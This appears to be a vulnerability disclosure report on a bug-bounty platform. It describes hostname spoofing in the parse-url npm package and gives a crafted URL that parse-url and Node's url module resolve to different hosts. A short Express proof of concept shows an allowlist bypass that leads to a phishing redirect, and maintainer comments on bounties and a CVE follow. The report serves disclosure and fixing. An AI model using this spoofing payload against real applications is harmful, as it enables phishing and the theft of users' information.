Hostname Spoofing in ionicabizau/parse-url
Reported on
Aug 7th 2022
Description
parse-url parses the following http(s) URL incorrectly: it identifies the protocol as ssh, and the host name is parsed incorrectly as well.
https://www.google.com:x@fakesite.com:x
# node -e 'const parseUrl=require("parse-url");console.log(parseUrl("https://www.google.com:x@fakesite.com:x"))'
{
protocols: [ 'ssh' ],
protocol: 'ssh',
port: '',
resource: 'www.google.com',
host: 'www.google.com',
user: 'git',
password: '',
pathname: '/x',
hash: '',
search: '',
href: 'https://www.google.com:x@fakesite.com:x',
query: {},
parse_failed: false
}
But the built-in url library parses it correctly.
# node -e 'const url=require("url");console.log(url.parse("https://www.google.com:x@fakesite.com:x"))'
Url {
protocol: 'https:',
slashes: true,
auth: 'www.google.com:x',
host: 'fakesite.com',
port: null,
hostname: 'fakesite.com',
hash: null,
search: null,
query: null,
pathname: '/:x',
path: '/:x',
href: 'https://www.google.com:x@fakesite.com/:x'
}
This may allow a hostname whitelist to be bypassed, so an attacker could carry out a phishing attack.
Proof of Concept
Consider the following attack scenario: the developer uses the parse-url library to check whether the URL hostname is www.google.com, and uses the url library to perform the redirect.
If the attacker constructs a malformed URL, the user will be redirected to a phishing site.
// PoC.js
const parseUrl = require("parse-url");
const Url = require("url");
const express = require("express");
const app = express();

const url = "https://www.google.com:x@fakesite.com:x";

// parse-url reports host 'www.google.com' for this string
const parsed = parseUrl(url);
console.log("[*]`parse-url` output: ");
console.log(parsed);

// the built-in url module reports host 'fakesite.com' for the same string
const parsed2 = Url.parse(url);
console.log("[*]`url` output: ");
console.log(parsed2);

app.get("/", (req, res) => {
  // the hostname check is made on the parse-url result ...
  if (parsed.host == "www.google.com") {
    // ... but the link is built from the url-module result, which points at fakesite.com
    res.send("<a href='" + parsed2.href + "'>CLICK ME!</a>");
  }
});

app.listen(8888, "0.0.0.0");
Impact
This allows the hostname whitelist to be bypassed; an attacker could carry out a phishing attack and steal sensitive information.
Thank you for this finding!
@Automne Not sure why the disclosure bounty got reset to $0... Thank you very much for this finding.
@admin, what's wrong with the disclosure bounty? Why does it display as $0 there...
As mentioned by Adam over e-mail, the bounties were withdrawn for this project prior to the vulnerability being deemed valid. We’re hoping to post new bounties soon.
@admin Why were the bounties withdrawn for this project? After the call with one of the members of the Huntr staff (couple of months ago), I was encouraged to keep the project as active as possible and I tried that...
Hi Ionică Bizău, rest assured that is not a reflection on you or the project. We're currently renegotiating terms with the organisation that was sponsoring your project, and so hopefully will be able to fund more security maintenance in the near future.
@ionicabizau - are you happy for us to assign and publish a CVE for this report?
The researcher has requested one :)
@JamieSlome Sure, that works!
If I am not wrong, the bounty reset to 0 when I changed the Severity from High (7.3) to Critical (9.4). I am wondering now if it would have reset without that change...